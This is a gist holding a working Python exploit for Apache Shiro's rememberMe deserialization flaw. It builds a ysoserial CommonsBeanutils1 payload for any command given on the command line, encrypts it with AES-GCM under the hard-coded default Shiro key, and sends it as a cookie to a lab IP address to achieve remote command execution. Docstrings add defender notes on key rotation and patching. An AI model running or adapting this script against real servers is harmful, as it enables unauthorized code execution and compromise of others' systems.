
@wingzRED
Created August 9, 2022 12:27
#!/usr/bin/env python
# usage: python3 shiro.py "touch /tmp/UWU"
import time
import base64
import uuid
import requests
import subprocess
import random
import os
import sys
import binascii
from Cryptodome.Cipher import AES
# Base URL the single test request is sent to. The address is in the
# RFC 1918 private range, so this is presumably a lab instance.
SHIRO_URL = "http://192.168.91.130:8888/"

# Local path of the ysoserial jar; the script refuses to run if it is missing.
JAR_FILE = "/home/wingz/tools/ysoserial/ysoserial-all.jar"

# Name of the ysoserial gadget chain passed on the java command line.
YSOSERIAL_GADGET = "CommonsBeanutils1"
def poc(url, cmd):
    """Send one GET to *url* carrying a generated ``rememberMe`` cookie.

    The cookie value comes from ``generator(cmd)``. The function prints the
    generated value, then the HTTP status code and body of the reply. Any
    exception raised while building the cookie or making the request is
    printed and swallowed; nothing is returned.

    Defender note: the only request-side artefact visible here is the
    ``rememberMe`` cookie itself, a base64 blob much longer than an ordinary
    session value. Deployments are presumably exposed only while the key
    hard-coded in ``generator`` is still the one the server uses, so
    configuring a unique, randomly generated rememberMe key and keeping
    Shiro patched is the relevant mitigation.
    """
    rule = "============================================================================"
    print(rule)
    print("Sending payload [%s] to %s" % (cmd, url))
    print(rule)
    try:
        cookie_value = generator(cmd)
        print(type(cookie_value))
        print("Generated rememberMe payload:\n %s" % repr(cookie_value))
        # The cookie jar needs text, and the base64 output is pure ASCII.
        jar = {'rememberMe': cookie_value.decode('ascii')}
        response = requests.get(url, cookies=jar, timeout=10)
        print(rule)
        print("Shiro response [%s]:\n%s" % (response.status_code, response.text))
    except Exception as err:
        # Best-effort script: report the failure and carry on to exit.
        print(err)
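def generator(cmd):
    """Return the base64-encoded ``rememberMe`` cookie value built for *cmd*.

    Steps, as performed below:

    1. Run ``java -jar JAR_FILE YSOSERIAL_GADGET cmd`` and capture its stdout
       (the serialized Java object emitted by ysoserial).
    2. Encrypt those bytes with AES in GCM mode under a key hard-coded here.
    3. Return ``base64(nonce + ciphertext + tag)`` as ``bytes``.

    The exit status of the java process is not checked, so a failed run
    yields an encrypted empty payload rather than an error.

    NOTE(review): the key below appears to be the widely published default
    Shiro rememberMe key. A server that has replaced it with its own random
    key cannot decrypt this cookie, which is why rotating the key (and
    staying on a patched Shiro release) closes this path.
    """
    # The context manager closes the stdout pipe and waits for the JVM to
    # exit, so the child is always reaped (the original left it dangling).
    with subprocess.Popen(
        ['java', '-jar', JAR_FILE, YSOSERIAL_GADGET, cmd],
        stdout=subprocess.PIPE,
    ) as proc:
        ysoserial_payload = proc.stdout.read()

    # Encrypt the payload using AES-GCM. No nonce is passed in, so the
    # library generates one; it is read back from cipher.nonce below. (The
    # original also assigned a constant nonce that was never used; removed.)
    key = "kPH+bIxk5D2deZiIxcaaaA=="
    cipher = AES.new(base64.b64decode(key), AES.MODE_GCM)
    ciphertext, tag = cipher.encrypt_and_digest(ysoserial_payload)

    # Wire layout: nonce, then ciphertext, then authentication tag.
    return base64.b64encode(cipher.nonce + ciphertext + tag)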
# Script entry: exactly one positional argument (the command string) is
# required; without it, print the usage line and stop.
if len(sys.argv) <= 1:
    print("python3 {} <cmd to execute>".format(sys.argv[0]))
    sys.exit(1)

# generator() shells out to the ysoserial jar, so fail early if it is absent.
if not os.path.exists(JAR_FILE):
    print("The ysoserial jar file at %s doesn't exist!" % JAR_FILE)
    sys.exit(1)

# One request against the hard-coded SHIRO_URL; poc() prints the outcome.
cmd = sys.argv[1]
poc(SHIRO_URL, cmd)